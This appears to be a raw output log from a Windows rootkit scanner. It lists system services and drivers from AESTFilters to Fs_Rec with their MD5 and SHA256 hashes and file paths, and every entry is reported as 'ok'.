21:54:03.0493 0x1f20 [ 827DBC22C96EECF6D36A13162FABAFD3, EBBC04A6AD3BC83E3791569C1120BBBB59AF70512FA2CEB6A8BA2A257F3F6C32 ] AESTFilters     C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\aestsrv.exe
21:54:03.0540 0x1f20 AESTFilters - ok
21:54:03.0602 0x1f20 [ D0B388DA1D111A34366E04EB4A5DD156, 60D226F027F4025CC032CAFF73A80FAFB5FA75445654FDCF80CA8C0419C6E938 ] AFD             C:\Windows\system32\drivers\afd.sys
21:54:03.0649 0x1f20 AFD - ok
21:54:03.0789 0x1f20 [ 7E10E3BB9B258AD8A9300F91214D67B9, CE5FAD7BF78234B64EAADF64DB23F3C342AADB9C5E3B0168E57863F494F30318 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
21:54:03.0867 0x1f20 AgereSoftModem - ok
21:54:03.0899 0x1f20 [ 507812C3054C21CEF746B6EE3D04DD6E, D7E59350AC338AD229E3D10C76E32AE16D120311B263714A9CD94AB538633B0E ] agp440          C:\Windows\system32\drivers\agp440.sys
21:54:03.0914 0x1f20 agp440 - ok
21:54:03.0961 0x1f20 [ 8B30250D573A8F6B4BD23195160D8707, 64EC289AFCD63D84EAFD9D81C50D0A77BCC79A1EFF32C50B2776BB0C0151757D ] aic78xx         C:\Windows\system32\DRIVERS\djsvs.sys
21:54:03.0992 0x1f20 aic78xx - ok
21:54:04.0086 0x1f20 [ 18A54E132947CD98FEA9ACCC57F98F13, 9D39AF972785E49F0DD12C4BAEF39A79CD69F098886BF152AF1B7CCE2E902115 ] ALG             C:\Windows\System32\alg.exe
21:54:04.0179 0x1f20 ALG - ok
21:54:04.0211 0x1f20 [ 0D40BCF52EA90FC7DF2AEAB6503DEA44, 1D1AA8F50935D976C29DE7A84708CADBBBDD936F0DD2C059E820F0D21367B3B6 ] aliide          C:\Windows\system32\drivers\aliide.sys
21:54:04.0226 0x1f20 aliide - ok
21:54:04.0257 0x1f20 [ 3C6600A0696E90A463771C7422E23AB5, 370B33DC1C25B981628A318BAE434A78A5F0A0DA93C2896DC7A3D7B87AE1A5E7 ] amdagp          C:\Windows\system32\drivers\amdagp.sys
21:54:04.0273 0x1f20 amdagp - ok
21:54:04.0289 0x1f20 [ CD5914170297126B6266860198D1D4F0, 2239FCBD1A7EC27CE4F10DA36AE6BD6CCB87E5128C82CA71B84BFE5AF5602A60 ] amdide          C:\Windows\system32\drivers\amdide.sys
21:54:04.0320 0x1f20 amdide - ok
21:54:04.0413 0x1f20 [ 00DDA200D71BAC534BF56A9DB5DFD666, CA316B1FFD85BA1CF8664B3229DA1F238A5341E016059F7ED89702324CFD124B ] AmdK8           C:\Windows\system32\DRIVERS\amdk8.sys
21:54:04.0491 0x1f20 AmdK8 - ok
21:54:04.0507 0x1f20 [ 3CBF30F5370FDA40DD3E87DF38EA53B6, 7EACF1743367BE805357B6FD10F8F99E9B1C301FE3782D77719347B13DFA65EC ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
21:54:04.0523 0x1f20 AmdPPM - ok
21:54:04.0616 0x1f20 [ D320BF87125326F996D4904FE24300FC, F767D8C5C58D57202905D829F7AE1B1FF33937F407FDCE4C90E32A6638F27416 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
21:54:04.0663 0x1f20 amdsata - ok
21:54:04.0694 0x1f20 [ EA43AF0C423FF267355F74E7A53BDABA, 3F1335909AB0281A2FBDD7AD90E18309E091656CD32B48894B992789D8C61DB4 ] amdsbs          C:\Windows\system32\DRIVERS\amdsbs.sys
21:54:04.0710 0x1f20 amdsbs - ok
21:54:04.0725 0x1f20 [ 46387FB17B086D16DEA267D5BE23A2F2, 8B8AC61B91F154B4EB5CC6DECB5FCCEBA8B42EFE94859947136AD06681EA8ED0 ] amdxata         C:\Windows\system32\drivers\amdxata.sys
21:54:04.0741 0x1f20 amdxata - ok
21:54:04.0772 0x1f20 [ 7DF70A08B56CBBC874744D9B0B396272, D3C906AC5BE0634C69D8C889045BF2A787887B8A1B621C30A9ED48C5609AEE80 ] ApfiltrService C:\Windows\system32\DRIVERS\Apfiltr.sys
21:54:04.0835 0x1f20 ApfiltrService - ok
21:54:04.0866 0x1f20 [ E499E422412EF37576092A52648DB2B4, 95E9C11258CAF37060242BA4E1170CEDECF3376CF0A9A1E61D46706D7C7F36F8 ] AppID           C:\Windows\system32\drivers\appid.sys
21:54:04.0928 0x1f20 AppID - ok
21:54:05.0006 0x1f20 [ 89B6FA43B68A373B304DFB8F6776B255, 36ABD9AB89CBC7991DE9B04051B26014982953697862BC46EF8AE4ACC2404128 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
21:54:05.0053 0x1f20 AppIDSvc - ok
21:54:05.0100 0x1f20 [ EACFDF31921F51C097629F1F3C9129B4, 24138755D823E69760579ECBD672421192457CDC9941B2BC499C2D34D83E86C3 ] Appinfo         C:\Windows\System32\appinfo.dll
21:54:05.0162 0x1f20 Appinfo - ok
21:54:05.0193 0x1f20 [ 2932004F49677BD84DBC72EDB754FFB3, 73F84582244AC53994A2F4499A119B4A84A6BF7FD3046C29A8080C763DE540B8 ] arc             C:\Windows\system32\DRIVERS\arc.sys
21:54:05.0225 0x1f20 arc - ok
21:54:05.0256 0x1f20 [ 5D6F36C46FD283AE1B57BD2E9FEB0BC7, F7C9C3B4F2C816F57A43B2921672858C291054220BADE291044343778216F6BA ] arcsas          C:\Windows\system32\DRIVERS\arcsas.sys
21:54:05.0271 0x1f20 arcsas - ok
21:54:05.0412 0x1f20 [ 9D768C43FEF254DD50B1DBF8AD5C4C0B, A50854EA5C08605133B8BB4DFDC6090357C5665314AA72E0BFA1E07D4E451F09 ] aspnet_state    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
21:54:05.0443 0x1f20 aspnet_state - ok
21:54:05.0474 0x1f20 [ ADD2ADE1C2B285AB8378D2DAAF991481, 7965A705F37924C0EC7A934E64E89C5DF4069816E2EEA3509E0AC90F78910519 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
21:54:05.0927 0x1f20 AsyncMac - ok
21:54:06.0051 0x1f20 [ 338C86357871C167A96AB976519BF59E, F28CC534523D1701B0552F5D7E18E88369C4218BDB1F69110C3E31D395884AD6 ] atapi           C:\Windows\system32\drivers\atapi.sys
21:54:06.0067 0x1f20 atapi - ok
21:54:06.0145 0x1f20 [ F4157B3CECF19B1C266C83AFF051C97A, 26728B59B6003EB36BC322D189254574E94790CE23637228A669FAD6ED76ECE3 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
21:54:06.0192 0x1f20 AudioEndpointBuilder - ok
21:54:06.0223 0x1f20 [ F4157B3CECF19B1C266C83AFF051C97A, 26728B59B6003EB36BC322D189254574E94790CE23637228A669FAD6ED76ECE3 ] Audiosrv        C:\Windows\System32\Audiosrv.dll
21:54:06.0254 0x1f20 Audiosrv - ok
21:54:06.0285 0x1f20 [ 6E30D02AAC9CAC84F421622E3A2F6178, 229DC527C1D6C778BCA2C855A2A6F6D2C4B0F4F6DE56C886B3AAD26E3347952C ] AxInstSV        C:\Windows\System32\AxInstSV.dll
21:54:06.0348 0x1f20 AxInstSV - ok
21:54:06.0410 0x1f20 [ 1A231ABEC60FD316EC54C66715543CEC, 09E2897BA80737997A286EA5408C03DD3CC0EBACD24CB391C2455B6D4BE7D67E ] b06bdrv         C:\Windows\system32\DRIVERS\bxvbdx.sys
21:54:06.0473 0x1f20 b06bdrv - ok
21:54:06.0504 0x1f20 [ BD8869EB9CDE6BBE4508D869929869EE, F4363A12EBFDBB89C69FD59B22F9EE05BADA07D477A1DF2DE01F59D6EE496543 ] b57nd60x        C:\Windows\system32\DRIVERS\b57nd60x.sys
21:54:06.0582 0x1f20 b57nd60x - ok
21:54:06.0769 0x1f20 [ C8F0FA214AF830BC4BBF6FB38631F5CC, FB68C698D87B7FDFA8E4105FFD04B19EF0F7D6B5F91200B4CA1A57377F6FA359 ] BCM43XX         C:\Windows\system32\DRIVERS\bcmwl6.sys
21:54:06.0894 0x1f20 BCM43XX - ok
21:54:07.0003 0x1f20 [ EE1E9C3BB8228AE423DD38DB69128E71, ED54FD9795F3A4D32F02BED6052AD9404409A05644CDBEBFF19C662D104DA95A ] BDESVC          C:\Windows\System32\bdesvc.dll
21:54:07.0065 0x1f20 BDESVC - ok
21:54:07.0097 0x1f20 [ 505506526A9D467307B3C393DEDAF858, 8AD6F1492E357F57CF42261497BA29122045D4FC0DCC9669AA5AC9B2A4BABFA4 ] Beep            C:\Windows\system32\drivers\Beep.sys
21:54:07.0190 0x1f20 Beep - ok
21:54:07.0284 0x1f20 [ 1E2BAC209D184BB851E1A187D8A29136, 53933C938DA5126986FFF2918C1F522ABE93ABAB460AE32E4453161C2F7B68DF ] BFE             C:\Windows\System32\bfe.dll
21:54:07.0362 0x1f20 BFE - ok
21:54:07.0455 0x1f20 [ E585445D5021971FAE10393F0F1C3961, 178C008A9A0A6BFDA65EB0B98C510271360AD4474F22F13594F5EB60AA4E1CF5 ] BITS            C:\Windows\System32\qmgr.dll
21:54:07.0799 0x1f20 BITS - ok
21:54:07.0830 0x1f20 [ 2287078ED48FCFC477B05B20CF38F36F, 55BCA6174E6034A8D61CBE4126B2F1989F6052BFA624BEA9C0A0A664AEC74521 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
21:54:07.0845 0x1f20 blbdrive - ok
21:54:07.0892 0x1f20 [ 8F2DA3028D5FCBD1A060A3DE64CD6506, E234672E9CFE1A95AD2E78E306E41E010B870221E6EBBC0E2B0BE2FA5CE0CD76 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
21:54:07.0955 0x1f20 bowser - ok
21:54:08.0001 0x1f20 [ 9F9ACC7F7CCDE8A15C282D3F88B43309, A9131334BD9CF8FD60BA9D54AA054E2DF2BE1219FB650DF1464F2787BDEAE98F ] BrFiltLo        C:\Windows\system32\DRIVERS\BrFiltLo.sys
21:54:08.0079 0x1f20 BrFiltLo - ok
21:54:08.0095 0x1f20 [ 56801AD62213A41F6497F96DEE83755A, 0DEB8318FB47DF6473C171C795C735E26A73FA12232876C6856549EA16F33361 ] BrFiltUp        C:\Windows\system32\DRIVERS\BrFiltUp.sys
21:54:08.0126 0x1f20 BrFiltUp - ok
21:54:08.0157 0x1f20 [ 3DAA727B5B0A45039B0E1C9A211B8400, 903B51E75F0C503A0E255120F53BF51B047B219FEC1E15F2F1D02DDD562FC73B ] Browser         C:\Windows\System32\browser.dll
21:54:08.0220 0x1f20 Browser - ok
21:54:08.0235 0x1f20 [ 845B8CE732E67F3B4133164868C666EA, 9309B094CD9B5EBC46295A5EB806BED472C3CEDE3B5F6F497EBDABA496A2A27F ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
21:54:08.0282 0x1f20 Brserid - ok
21:54:08.0298 0x1f20 [ 203F0B1E73ADADBBB7B7B1FABD901F6B, 782FA7B26940FE479C49C9BAA2EB582CDAAAD607013E9BCFC85E6FBBB7D49A6D ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
21:54:08.0329 0x1f20 BrSerWdm - ok
21:54:08.0376 0x1f20 [ BD456606156BA17E60A04E18016AE54B, DFBDC9DA6A3EA40BACFF204BC6C55C2C122B5885D2CBF6D45054DE43EE15EC4D ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
21:54:08.0407 0x1f20 BrUsbMdm - ok
21:54:08.0407 0x1f20 [ AF72ED54503F717A43268B3CC5FAEC2E, 4A638669B0C30B1BDED242A8BF2015A37749570FF4D67D190BACC8D7E0C44468 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
21:54:08.0423 0x1f20 BrUsbSer - ok
21:54:08.0501 0x1f20 [ 2865A5C8E98C70C605F417908CEBB3A4, B1C5AC228BD7072AF8668C009C6CDC13EE9FCB9481F57524300F37C40BF1E935 ] BthEnum         C:\Windows\system32\drivers\BthEnum.sys
21:54:08.0547 0x1f20 BthEnum - ok
21:54:08.0563 0x1f20 [ ED3DF7C56CE0084EB2034432FC56565A, B5B75E002E7BC0209582C635CCCA26DB569BDB23C33A126634E00C6434BF941B ] BTHMODEM        C:\Windows\system32\DRIVERS\bthmodem.sys
21:54:08.0625 0x1f20 BTHMODEM - ok
21:54:08.0641 0x1f20 [ AD1872E5829E8A2C3B5B4B641C3EAB0E, 8C2DBCAC08DDB41E2B44E257C55FA2D0272959B308EFF9EAF5FF9AE1E4A0AA39 ] BthPan          C:\Windows\system32\DRIVERS\bthpan.sys
21:54:08.0735 0x1f20 BthPan - ok
21:54:08.0781 0x1f20 [ 1153DE2E4F5941E10C399CB5592F78A1, 2B88AF246D62F72FA9F5B921B0375AE59A0F263672472D5EC9FDB5CA5EF51C31 ] BTHPORT         C:\Windows\System32\Drivers\BTHport.sys
21:54:08.0844 0x1f20 BTHPORT - ok
21:54:08.0875 0x1f20 [ 1DF19C96EEF6C29D1C3E1A8678E07190, 1F4BB161FF3A1C5B1465BB52F3520FEDB7ACB1FAA132466F07D16DB8E394AEA5 ] bthserv         C:\Windows\system32\bthserv.dll
21:54:08.0906 0x1f20 bthserv - ok
21:54:08.0922 0x1f20 [ C81E9413A25A439F436B1D4B6A0CF9E9, A4C290163207AED22C70C7F90B28F6FC24892889643D60D915059405AC5A4A72 ] BTHUSB          C:\Windows\System32\Drivers\BTHUSB.sys
21:54:08.0937 0x1f20 BTHUSB - ok
21:54:08.0969 0x1f20 [ D57D29132EFE13A83133D9BD449E0CF1, 8C12FC2404A53EFA028B3423A96F2B5ADDE1640A964AFAF2C460E73338551FFB ] btwaudio        C:\Windows\system32\drivers\btwaudio.sys
21:54:08.0984 0x1f20 btwaudio - ok
21:54:09.0015 0x1f20 [ D282C14A69357D0E1BAFAECC2CA98C3A, 1F576218591B87920641F7E2FA349E477032C4C38DF5A6584738DC0280E203A9 ] btwavdt         C:\Windows\system32\DRIVERS\btwavdt.sys
21:54:09.0031 0x1f20 btwavdt - ok
21:54:09.0109 0x1f20 [ 7D2DD14E60CE4FF3308D66FDA7990546, FB92C2FAE8C9F3F25A5766BFB1A05CD4D7BF8FB84F548752C17476926B21153F ] btwdins         C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
21:54:09.0156 0x1f20 btwdins - ok
21:54:09.0187 0x1f20 [ AAFD7CB76BA61FBB08E302DA208C974A, 1B342095E373ECCA1775B30E92CD337BECEB4BA9F821132C33507A646E6A341C ] btwl2cap        C:\Windows\system32\DRIVERS\btwl2cap.sys
21:54:09.0203 0x1f20 btwl2cap - ok
21:54:09.0218 0x1f20 [ 02EB4D2B05967DF2D32F29C84AB1FB17, 95B7901F7BCE41DF53309158AC12888BA1F82FF2E576BF3ED0E67EA3CFAB1288 ] btwrchid        C:\Windows\system32\DRIVERS\btwrchid.sys
21:54:09.0218 0x1f20 btwrchid - ok
21:54:09.0296 0x1f20 [ 399A7DF138D2110A3EB9BD64D6327F62, BCEB1661505CBC06B10AA828FCBAB0DDDD15F78A3CCD1B1717662427CF437895 ] ccEvtMgr        C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
21:54:09.0312 0x1f20 ccEvtMgr - ok
21:54:09.0327 0x1f20 [ 399A7DF138D2110A3EB9BD64D6327F62, BCEB1661505CBC06B10AA828FCBAB0DDDD15F78A3CCD1B1717662427CF437895 ] ccSetMgr        C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
21:54:09.0343 0x1f20 ccSetMgr - ok
21:54:09.0374 0x1f20 [ 77EA11B065E0A8AB902D78145CA51E10, 160EB3BBE9E5F3CC4A02584E6F2576A812C7565B940D74838B983F1EE51FA73A ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
21:54:09.0421 0x1f20 cdfs - ok
21:54:09.0483 0x1f20 [ BE167ED0FDB9C1FA1133953C18D5A6C9, E26A851CA13E7300F977E5B20FA5D25FD0E1442AB6AD5DB58BBDB2DAAD87027C ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
21:54:09.0515 0x1f20 cdrom - ok
21:54:09.0577 0x1f20 [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] CertPropSvc     C:\Windows\System32\certprop.dll
21:54:09.0624 0x1f20 CertPropSvc - ok
21:54:09.0655 0x1f20 [ 3FE3FE94A34DF6FB06E6418D0F6A0060, 6B3A2A26609A75B690D4C0B3059E40822F3B3DB08943F58EC496BABDA7D0A735 ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
21:54:09.0702 0x1f20 circlass - ok
21:54:09.0749 0x1f20 [ 635181E0E9BBF16871BF5380D71DB02D, 58D5150C6F3B9F1730FFDF3A8A2ABF5FF207F9785BD66C0C1E03A0F1C223A26A ] CLFS            C:\Windows\system32\CLFS.sys
21:54:09.0795 0x1f20 CLFS - ok
21:54:09.0858 0x1f20 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
21:54:09.0905 0x1f20 clr_optimization_v2.0.50727_32 - ok
21:54:09.0951 0x1f20 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
21:54:09.0983 0x1f20 clr_optimization_v4.0.30319_32 - ok
21:54:09.0998 0x1f20 [ DEA805815E587DAD1DD2C502220B5616, 2D6A7668C95352B818F5EC59FF462894935833D34190257DA9CAC7E67FD3631C ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
21:54:10.0014 0x1f20 CmBatt - ok
21:54:10.0029 0x1f20 [ C537B1DB64D495B9B4717B4D6D9EDBF2, 400EEFE662DE117C9CC956E4CBD5E98F28F962E7447CD93E8A78FDD8CA39EB4B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
21:54:10.0061 0x1f20 cmdide - ok
21:54:10.0107 0x1f20 [ F516F1167EFBBC5ABC90687C94497869, AD650D56241533439419EA00236ABE14AB6E50B768620211D1A44047A9FA14EC ] CNG             C:\Windows\system32\Drivers\cng.sys
21:54:10.0154 0x1f20 CNG - ok
21:54:10.0217 0x1f20 [ F9A79C5B27037821112C50A9C8FB367A, D9990AE1A0CA767E54C9D3FD2C6EA2A068DFD5A270102E915F71648A0C59097B ] Com4QLBEx       C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
21:54:10.0263 0x1f20 Com4QLBEx - ok
21:54:10.0295 0x1f20 [ A6023D3823C37043986713F118A89BEE, FAC239A7FA6251C7EDFFA34B4BAE3910B8BC0BD4A3574B6DB6931A8D691E207B ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
21:54:10.0326 0x1f20 Compbatt - ok
21:54:10.0373 0x1f20 [ CBE8C58A8579CFE5FCCF809E6F114E89, AC083A1C649EBA18C59FCC1772D0784B10E2B8C63094E3C14388E147DBC3F6DF ] CompositeBus    C:\Windows\system32\drivers\CompositeBus.sys
21:54:10.0435 0x1f20 CompositeBus - ok
21:54:10.0451 0x1f20 COMSysApp - ok
21:54:10.0466 0x1f20 [ 2C4EBCFC84A9B44F209DFF6C6E6C61D1, 6FC323217D82EF661BA0E3F949B61B05BB5235D1A69C81D24876C2153FAECEF6 ] crcdisk         C:\Windows\system32\DRIVERS\crcdisk.sys
21:54:10.0497 0x1f20 crcdisk - ok
21:54:10.0544 0x1f20 [ 623E143F2DF17C0106A9988F5D7DC878, 9DA30262FF22FA9F1DB247CB3B4A2892D79730EF0ECC9589D399D24B4F58E565 ] CryptSvc        C:\Windows\system32\cryptsvc.dll
21:54:10.0607 0x1f20 CryptSvc - ok
21:54:10.0653 0x1f20 [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] DcomLaunch      C:\Windows\system32\rpcss.dll
21:54:10.0747 0x1f20 DcomLaunch - ok
21:54:10.0841 0x1f20 [ 8D6E10A2D9A5EED59562D9B82CF804E1, 888F9650F4E872BA8F4E0C27E38A6672A561042B17EBA40E306A22357965B0AD ] defragsvc       C:\Windows\System32\defragsvc.dll
21:54:10.0950 0x1f20 defragsvc - ok
21:54:11.0012 0x1f20 [ F024449C97EC1E464AAFFDA18593DB88, 7EF1E241892E098A472BCA14C724DFF1AACCF190954AF1C4A38B6D542CC74BD2 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
21:54:11.0059 0x1f20 DfsC - ok
21:54:11.0106 0x1f20 [ 560B0DCE52DFED6623B27C9BAFA6F236, BB4156BB1CCA64CCDE065870DAE56CD58BF05CEBF7C3B17C7A821FDF02A8B157 ] dg_ssudbus      C:\Windows\system32\DRIVERS\ssudbus.sys
21:54:11.0121 0x1f20 dg_ssudbus - ok
21:54:11.0153 0x1f20 [ E9E01EB683C132F7FA27CD607B8A2B63, 4D9037B458C522874619143A4176BCED42472C68933E6E83D37B67242706F3C4 ] Dhcp            C:\Windows\system32\dhcpcore.dll
21:54:11.0199 0x1f20 Dhcp - ok
21:54:11.0231 0x1f20 [ 1A050B0274BFB3890703D490F330C0DA, 79D74F4679A2EE040FAAF4D0392A9311239A10A5F8A5CCB48656C6F89B6D62FB ] discache        C:\Windows\system32\drivers\discache.sys
21:54:11.0277 0x1f20 discache - ok
21:54:11.0309 0x1f20 [ 565003F326F99802E68CA78F2A68E9FF, ABC42B24DBA4FFC411120E09278EF26AF56CCAB463B69B4BD6C530B4A07063D2 ] Disk            C:\Windows\system32\DRIVERS\disk.sys
21:54:11.0340 0x1f20 Disk - ok
21:54:11.0387 0x1f20 [ 33EF4861F19A0736B11314AAD9AE28D0, 4C4B84365D85758E3263B88F157D8B086B392C6F1EA5F0F3DB6BF87EF90248EC ] Dnscache        C:\Windows\System32\dnsrslvr.dll
21:54:11.0465 0x1f20 Dnscache - ok
21:54:11.0511 0x1f20 [ 366BA8FB4B7BB7435E3B9EACB3843F67, 65B7C61ACF34F1F0149045AA9E09A3F917A927963237A385A914D0B80551DC31 ] dot3svc         C:\Windows\System32\dot3svc.dll
21:54:11.0589 0x1f20 dot3svc - ok
21:54:11.0652 0x1f20 [ 8EC04CA86F1D68DA9E11952EB85973D6, 2E3FBC2D683D1274E8BC45EEEA87D43B77EDDCAAF0D453296D9FDA6B9D717071 ] DPS             C:\Windows\system32\dps.dll
21:54:11.0730 0x1f20 DPS - ok
21:54:11.0777 0x1f20 [ B918E7C5F9BF77202F89E1A9539F2EB4, C589A37DE50BBEF22E2DAA9682EA43147F614AA1AF7DAAA942BA5FC192313A0B ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
21:54:11.0823 0x1f20 drmkaud - ok
21:54:11.0886 0x1f20 [ 3583A5A8CC2E682BFFBD4630D0FEC08B, FD0F184B358FCECAA763444B414074BEF4E871EB7527D88385519FC158435C72 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
21:54:11.0948 0x1f20 DXGKrnl - ok
21:54:11.0979 0x1f20 [ 8600142FA91C1B96367D3300AD0F3F3A, 5713625E27DF11FAAFDA7AC79899A6AD813166E167088FA990EC5DE87DBE83DF ] EapHost         C:\Windows\System32\eapsvc.dll
21:54:12.0026 0x1f20 EapHost - ok
21:54:12.0213 0x1f20 [ 024E1B5CAC09731E4D868E64DBFB4AB0, AB0826A74BBEE5B7A1B035861B665C79BC98305CFC7D82BEF420558FBD3EE994 ] ebdrv           C:\Windows\system32\DRIVERS\evbdx.sys
21:54:12.0369 0x1f20 ebdrv - ok
21:54:12.0463 0x1f20 [ F289F7EDE8375C33450CBFCF07CDF0CD, 23FBCC2D1750559247E296A8EAB46A7E838189D5425AADD7C1C946BCC2DD1DAD ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
21:54:12.0713 0x1f20 eeCtrl - ok
21:54:12.0759 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] EFS             C:\Windows\System32\lsass.exe
21:54:12.0806 0x1f20 EFS - ok
21:54:12.0853 0x1f20 [ 0ED67910C8C326796FAA00B2BF6D9D3C, 97FAA7627A162B0AEC15545E0165D13355D535B4157604BB87F8EEB72ECD24A8 ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
21:54:12.0884 0x1f20 elxstor - ok
21:54:12.0931 0x1f20 [ 8DE31E848D20C6873A6AC10D9B7C1524, 7FF63C19FCC1B6D6FEDBFDE13EBE139885BEE0D5F6BEF50B37FC3B64980A1F93 ] EraserUtilRebootDrv C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
21:54:12.0947 0x1f20 EraserUtilRebootDrv - ok
21:54:12.0978 0x1f20 [ 8FC3208352DD3912C94367A206AB3F11, 69B65C12BDADD4B730508674B1B77C5496612B4ACCC447DB9AFE49ADEA8CBF02 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
21:54:12.0993 0x1f20 ErrDev - ok
21:54:13.0056 0x1f20 [ F6916EFC29D9953D5D0DF06882AE8E16, ED41893960018D5EC2F7829B1DE4B6967D9FD074D60B11B9EB854E3E0948EC24 ] EventSystem     C:\Windows\system32\es.dll
21:54:13.0087 0x1f20 EventSystem - ok
21:54:13.0118 0x1f20 [ 2DC9108D74081149CC8B651D3A26207F, 75CB47923A867DDAC512701CE71DFCFC340FC3A2E27F4255D0836A1FBC463176 ] exfat           C:\Windows\system32\drivers\exfat.sys
21:54:13.0165 0x1f20 exfat - ok
21:54:13.0181 0x1f20 [ 7E0AB74553476622FB6AE36F73D97D35, 41463A255FDA1D550B3385EC7C73ABC343B1BBBE9CEE4DF9F2A8B3E7338C4947 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
21:54:13.0227 0x1f20 fastfat - ok
21:54:13.0305 0x1f20 [ 967EA5B213E9984CBE270205DF37755B, 43153E23210B03FAE16897D62D55B8742F834EDC695F8401EAB5DE307F62602D ] Fax             C:\Windows\system32\fxssvc.exe
21:54:13.0352 0x1f20 Fax - ok
21:54:13.0383 0x1f20 [ E817A017F82DF2A1F8CFDBDA29388B29, 4CC9320A21E6FEA2D16C48D6BEA14391B695BD541A3C5FDDAEEE086A414FC837 ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
21:54:13.0399 0x1f20 fdc - ok
21:54:13.0430 0x1f20 [ F3222C893BD2F5821A0179E5C71E88FB, A85B947249DBB986358CCD4B158DD58A9301F074F3C6CCCDEF2D01F432E59D1B ] fdPHost         C:\Windows\system32\fdPHost.dll
21:54:13.0461 0x1f20 fdPHost - ok
21:54:13.0461 0x1f20 [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B, 0E76C29D2A974A3F2FBFCB63D066D4136B78E02F6B1F579B1865CA7A76193987 ] FDResPub        C:\Windows\system32\fdrespub.dll
21:54:13.0508 0x1f20 FDResPub - ok
21:54:13.0539 0x1f20 [ 6CF00369C97F3CF563BE99BE983D13D8, F65F35324A2FB9DFB533B1C4D089D990CC242218FE83414329D07B786D8EFF33 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
21:54:13.0555 0x1f20 FileInfo - ok
21:54:13.0571 0x1f20 [ 42C51DC94C91DA21CB9196EB64C45DB9, 388C68D12ECC8FFE3116FEAAF4DB7B80CF4A3F97E935788DD21C6ADE2369F635 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
21:54:13.0617 0x1f20 Filetrace - ok
21:54:13.0633 0x1f20 [ 87907AA70CB3C56600F1C2FB8841579B, CA1CD82A1CD453617CE5EA431A1836997F14E3580554E8A516D9FE1E9926D979 ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
21:54:13.0664 0x1f20 flpydisk - ok
21:54:13.0711 0x1f20 [ 7520EC808E0C35E0EE6F841294316653, 6EC65511B4838A7172A8F89E35C2F9DF4F0BFCE3BE12EDA790F3EB567102FF67 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
21:54:13.0742 0x1f20 FltMgr - ok
21:54:13.0805 0x1f20 [ E12C4928B32ACE04610259647F072635, B71B9C2DF45F33C4DAC88435129B08B0BCDBBE82E8C3AD0A95F00137CC8B619F ] FontCache       C:\Windows\system32\FntCache.dll
21:54:13.0883 0x1f20 FontCache - ok
21:54:13.0945 0x1f20 [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
21:54:13.0961 0x1f20 FontCache3.0.0.0 - ok
21:54:13.0976 0x1f20 [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
21:54:14.0007 0x1f20 FsDepends - ok
21:54:14.0023 0x1f20 [ 7DAE5EBCC80E45D3253F4923DC424D05, 8A2C4D5591509B0B0A44583520617A9AE34F32BB6E68A012A7D7870ED24F703A ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
21:54:14.0039 0x1f20 Fs_Rec - ok
